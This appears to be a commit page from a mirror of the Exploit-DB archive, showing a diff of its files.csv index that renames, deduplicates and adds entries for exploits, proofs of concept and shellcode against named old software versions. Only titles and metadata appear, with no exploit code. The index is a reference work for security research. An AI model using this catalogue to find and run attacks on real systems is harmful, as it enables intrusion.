bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-14

Browse source 
3 new exploits

Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit
Ethereal 0.10.10 / tcpdump 3.9.1 (rsvp_print) Infinite Loop Denial of Service Exploit

Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit
Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit

Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability

Absolute Form Processor XE-V 1.5 - (auth Bypass) SQL Injection Vulnerability

ipsec-tools racoon frag-isakmp Denial of Service PoC
IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC
PaoBacheca Guestbook 2.1 (login_ok) Auth Bypass Vulnerability
PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability
PaoBacheca Guestbook 2.1 - (login_ok) Auth Bypass Vulnerability
PaoLiber 1.1 - (login_ok) Authentication Bypass Vulnerability
IPsec-Tools < 0.7.2 - Multiple Remote Denial of Service Vulnerabilities
ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability

I-net Multi User Email Script SQLi Vulnerability

linux/x86 - break chroot execve /bin/sh 80 bytes
linux/x86 - break chroot execve /bin/sh (80 bytes)

Sysax Multi Server 5.64 - Create Folder Buffer Overflow

TikiWiki Project 1.8 tiki-read_article.php articleId Parameter XSS
TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter XSS

TikiWiki Project 1.8 tiki-print_article.php articleId Parameter XSS
TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter XSS
TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_faqs.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_trackers.php sort_mode Parameter SQL Injection
UBBCentral UBB.threads 6.2.3/6.5 login.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 online.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter XSS

CityPost PHP Image Editor M1 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M2 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M3 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor Imgsrc URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M4 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting Vulnerability
osCommerce 2.2 admin/countries.php page Parameter XSS
osCommerce 2.2 admin/currencies.php page Parameter XSS
osCommerce 2.2 - admin/countries.php page Parameter XSS
osCommerce 2.2 - admin/currencies.php page Parameter XSS
Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1)
Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2)
Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (1)
Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (2)

Joomla Gallery WD - SQL Injection Vulnerability

Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities
Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities
Photoshop CC2014 and Bridge CC 2014 - .PNG Parsing Memory Corruption Vulnerabilities
NRSS Reader 0.3.9 - Local Stack-Based Overflow
runAV mod_security - Arbitrary Command Execution
Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read
This commit is contained in:
Offensive Security 2016-05-14 05:03:47 +00:00
parent 3ef2faa870
commit 5e229672a0
16 changed files with 210 additions and 721 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

52
files.csv
View file

@ -775,7 +775,7 @@ id,file,description,date,author,platform,type,port
953,platforms/windows/remote/953.c,"Yager <= 5.24 - Remote Buffer Overflow Exploit",2005-04-25,cybertronic,windows,remote,1089
954,platforms/cgi/webapps/954.pl,"E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit",2005-04-25,z,cgi,webapps,0
955,platforms/windows/remote/955.py,"NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit",2005-04-26,"Sergio Alvarez",windows,remote,21
956,platforms/multiple/dos/956.c,"Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0
956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 (rsvp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,multiple,dos,0
957,platforms/linux/dos/957.c,"Tcpdump 3.8.x (ldp_print) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0
958,platforms/linux/dos/958.c,"Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit",2005-04-26,vade79,linux,dos,0
959,platforms/linux/dos/959.c,"Tcpdump 3.8.x/3.9.1 (isis_print) Infinite Loop DoS Exploit",2005-04-26,vade79,linux,dos,0
@ -802,7 +802,7 @@ id,file,description,date,author,platform,type,port
982,platforms/php/webapps/982.c,"ZeroBoard Worm Source Code",2005-05-06,N/A,php,webapps,0
983,platforms/windows/dos/983.cpp,"DataTrac Activity Console Denial of Service Exploit",2005-05-06,basher13,windows,dos,0
984,platforms/multiple/dos/984.c,"Ethereal <= 0.10.10 (dissect_ipc_state) Remote Denial of Service Exploit",2005-05-07,Nicob,multiple,dos,0
986,platforms/windows/remote/986.html,"Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
986,platforms/windows/remote/986.html,"Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit",2005-05-07,"Edward Gagnon",windows,remote,0
987,platforms/windows/remote/987.c,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (2nd)",2005-05-07,Silentium,windows,remote,0
988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service Exploit",2005-05-08,basher13,windows,dos,0
989,platforms/php/webapps/989.pl,"PhotoPost Arbitrary Data Remote Exploit",2005-05-13,basher13,php,webapps,0
@ -6846,7 +6846,6 @@ id,file,description,date,author,platform,type,port
7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC",2008-11-30,"Encrypt3d.M!nd ",windows,dos,0
7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0
7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability",2008-11-30,R3d-D3V!L,php,webapps,0
7300,platforms/php/webapps/7300.txt,"Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability",2008-11-30,R3d-D3V!L,php,webapps,0
7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 (Auth Bypass) SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0
7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Remote blind SQL Injection Vulnerability",2008-11-30,AlpHaNiX,php,webapps,0
7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 (qtv.mdb) Database Disclosure Vulnerability",2008-11-30,Cyber-Zone,php,webapps,0
@ -8036,7 +8035,6 @@ id,file,description,date,author,platform,type,port
8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0
8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0
8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0
8528,platforms/asp/webapps/8528.txt,"Absolute Form Processor XE-V 1.5 - (auth Bypass) SQL Injection Vulnerability",2009-04-24,"ThE g0bL!N",asp,webapps,0
8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling Vulnerability",2009-04-24,ZoRLu,asp,webapps,0
8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 - Remote Change Pasword Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0
8531,platforms/windows/dos/8531.pl,"SDP Downloader 2.3.0 - (.ASX) Local Heap Overflow PoC",2009-04-24,Cyber-Zone,windows,dos,0
@ -8175,7 +8173,7 @@ id,file,description,date,author,platform,type,port
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0
8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0
8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
8669,platforms/multiple/dos/8669.c,"IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
8670,platforms/windows/local/8670.php,"Pinnacle Studio 12 - (.hfz) Directory Traversal Vulnerability",2009-05-13,Nine:Situations:Group,windows,local,0
8671,platforms/php/webapps/8671.pl,"Family Connections CMS <= 1.9 (member) SQL Injection Exploit",2009-05-13,YEnH4ckEr,php,webapps,0
8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 (m_username) Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0
@ -8767,8 +8765,8 @@ id,file,description,date,author,platform,type,port
9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 - Arbitrary Shell Upload Vulnerability",2009-07-28,Mr.tro0oqy,php,webapps,0
9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local BoF Exploit (SEH)",2009-07-28,Koshi,windows,local,0
9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 (login_ok) Auth Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Auth Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass Vulnerability",2009-07-28,SirGod,php,webapps,0
9295,platforms/windows/dos/9295.txt,"Firebird SQL op_connect_request main listener shutdown Vulnerability",2009-07-28,"Core Security",windows,dos,0
9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0
9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion Vulnerability",2009-07-28,NoGe,php,webapps,0
@ -9387,8 +9385,6 @@ id,file,description,date,author,platform,type,port
10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0
10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 - 4.2-beta1 - Multiple XSS",2009-10-02,CoreLabs,jsp,webapps,0
10014,platforms/multiple/dos/10014.txt,"IPsec-Tools < 0.7.2 - Multiple Remote Denial of Service Vulnerabilities",2009-11-09,mu-b,multiple,dos,0
10015,platforms/multiple/remote/10015.txt,"ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability",2009-11-10,"Jon Oberheide",multiple,remote,67
10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0
10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0
10018,platforms/linux/local/10018.sh,"Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0
@ -10839,7 +10835,6 @@ id,file,description,date,author,platform,type,port
11847,platforms/windows/webapps/11847.txt,"Joomla Component com_gds SQL Injection Vulnerability",2010-03-23,"DevilZ TM",windows,webapps,0
11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Include Vulnerability",2010-03-23,mat,php,webapps,0
11850,platforms/php/webapps/11850.txt,"Zephyrus CMS (index.php) SQL Injection Vulnerability",2010-03-23,Phenom,php,webapps,0
14129,platforms/linux/webapps/14129.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-30,Sid3^effects,linux,webapps,0
11851,platforms/php/webapps/11851.txt,"Joomla Component Property Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0
11852,platforms/php/webapps/11852.txt,"Xataface Admin Auth Bypass Vulnerability",2010-03-23,Xinapse,php,webapps,0
11853,platforms/php/webapps/11853.txt,"Joomla Component SMEStorage Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0
@ -11934,7 +11929,7 @@ id,file,description,date,author,platform,type,port
13451,platforms/lin_x86/shellcode/13451.c,"linux/x86 add user 104 bytes",2004-09-12,"Matt Conover",lin_x86,shellcode,0
13452,platforms/lin_x86/shellcode/13452.c,"linux/x86 - break chroot 34 bytes",2004-09-12,dev0id,lin_x86,shellcode,0
13453,platforms/lin_x86/shellcode/13453.c,"linux/x86 - break chroot 46 bytes",2004-09-12,dev0id,lin_x86,shellcode,0
13454,platforms/lin_x86/shellcode/13454.c,"linux/x86 - break chroot execve /bin/sh 80 bytes",2004-09-12,preedator,lin_x86,shellcode,0
13454,platforms/lin_x86/shellcode/13454.c,"linux/x86 - break chroot execve /bin/sh (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0
13455,platforms/lin_x86/shellcode/13455.c,"linux/x86 execve /bin/sh encrypted 58 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0
13456,platforms/lin_x86/shellcode/13456.c,"linux/x86 execve /bin/sh xor encrypted 55 bytes",2004-09-12,N/A,lin_x86,shellcode,0
13457,platforms/lin_x86/shellcode/13457.c,"linux/x86 execve /bin/sh tolower() evasion 41 bytes",2004-09-12,N/A,lin_x86,shellcode,0
@ -18024,7 +18019,7 @@ id,file,description,date,author,platform,type,port
20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0
20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0
20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0
20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0
20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 - Create Folder Buffer Overflow",2012-08-21,"Matt Andreko",windows,remote,0
20703,platforms/php/webapps/20703.txt,"XODA Document Management System 0.4.5 - XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0
20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0
20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0
@ -21160,10 +21155,10 @@ id,file,description,date,author,platform,type,port
23952,platforms/php/webapps/23952.txt,"TikiWiki Project 1.8 categorize.php Direct Request Path Disclosure",2004-04-12,JeiAr,php,webapps,0
23953,platforms/php/webapps/23953.txt,"TikiWiki Project 1.8 messu-mailbox.php Multiple Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23954,platforms/php/webapps/23954.txt,"TikiWiki Project 1.8 messu-read.php Multiple Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 tiki-read_article.php articleId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23956,platforms/php/webapps/23956.txt,"TikiWiki Project 1.8 tiki-browse_categories.php parentId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 tiki-index.php comments_threshold Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 tiki-print_article.php articleId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 tiki-list_file_gallery.php galleryId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 tiki-upload_file.php galleryId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
23961,platforms/php/webapps/23961.txt,"TikiWiki Project 1.8 tiki-view_faq.php faqId Parameter XSS",2004-04-12,JeiAr,php,webapps,0
@ -21179,8 +21174,8 @@ id,file,description,date,author,platform,type,port
23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0
23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23974,platforms/php/webapps/23974.txt,"TikiWiki Project 1.8 tiki-file_galleries.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 - tiki-list_faqs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 - tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 tiki-list_blogs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 tiki-usermenu.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Parameter Cross-Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
@ -21986,8 +21981,8 @@ id,file,description,date,author,platform,type,port
24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0
24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.threads 6.2.3/6.5 showflat.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.threads 6.2.3/6.5 calendar.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 login.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.threads 6.2.3/6.5 online.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0
24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 KDE KFMCLIENT Remote Command Execution Vulnerability",2004-12-13,"Giovanni Delvecchio",linux,dos,0
24829,platforms/php/webapps/24829.txt,"PhpGedView 2.5/2.6 Login.PHP URL Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0
24830,platforms/php/webapps/24830.txt,"PhpGedView 2.5/2.6 Login.PHP Username Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0
@ -22603,11 +22598,7 @@ id,file,description,date,author,platform,type,port
25456,platforms/asp/webapps/25456.txt,"OneWorldStore DisplayResults.ASP Cross-Site Scripting Vulnerability",2005-04-19,Lostmon,asp,webapps,0
25457,platforms/php/webapps/25457.c,"UBBCentral 6.0 UBB.threads Printthread.PHP SQL Injection Vulnerability",2005-03-11,HLL,php,webapps,0
25458,platforms/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 Message.PHP Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor M1 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25460,platforms/php/webapps/25460.txt,"CityPost PHP Image Editor M2 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25461,platforms/php/webapps/25461.txt,"CityPost PHP Image Editor M3 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25462,platforms/php/webapps/25462.txt,"CityPost PHP Image Editor Imgsrc URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25463,platforms/php/webapps/25463.txt,"CityPost PHP Image Editor M4 URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload Simple-upload-53.PHP Cross-Site Scripting Vulnerability",2005-04-19,Thom,php,webapps,0
25465,platforms/linux/dos/25465.txt,"Logwatch 2.6 Secure Script Denial of Service Vulnerability",2005-04-20,anonymous,linux,dos,0
25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/Login.ASP SQL Injection Vulnerability",2005-04-20,c0d3r,asp,webapps,0
@ -25794,8 +25785,8 @@ id,file,description,date,author,platform,type,port
28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 Calendar.ASP Cross-Site Scripting Vulnerability",2006-10-27,MizoZ,asp,webapps,0
28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 admin/banner_manager.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 admin/banner_statistics.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 admin/countries.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 admin/currencies.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - admin/countries.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - admin/currencies.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 admin/languages.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 admin/manufacturers.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 admin/products_expected.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0
@ -25923,8 +25914,8 @@ id,file,description,date,author,platform,type,port
28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0
28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0
28875,platforms/php/webapps/28875.txt,"Freenews 1.1 Aff_News.PHP Remote File Include Vulnerability",2006-10-30,MoHaNdKo,php,webapps,0
28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1)",2006-10-30,"Michal Bucko",windows,remote,0
28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2)",2006-10-30,"Michal Bucko",windows,remote,0
28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (1)",2006-10-30,"Michal Bucko",windows,remote,0
28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (2)",2006-10-30,"Michal Bucko",windows,remote,0
28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 login.php username Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0
28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0
28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 RemoveChild Denial of Service Vulnerability",2006-10-30,"Wojciech H",windows,dos,0
@ -32986,7 +32977,6 @@ id,file,description,date,author,platform,type,port
36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0
36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote,0
36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0
36564,platforms/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0
36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0
@ -33722,8 +33712,7 @@ id,file,description,date,author,platform,type,port
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,hyp3rlinx,php,webapps,80
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37349,platforms/windows/dos/37349.txt,"Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 - .PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
37362,platforms/lin_x86-64/shellcode/37362.c,"linux/x86-64 execve(/bin/sh) 30 bytes",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection Vulnerabilities",2015-06-24,cfreer,php,webapps,80
@ -36016,3 +36005,6 @@ id,file,description,date,author,platform,type,port
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
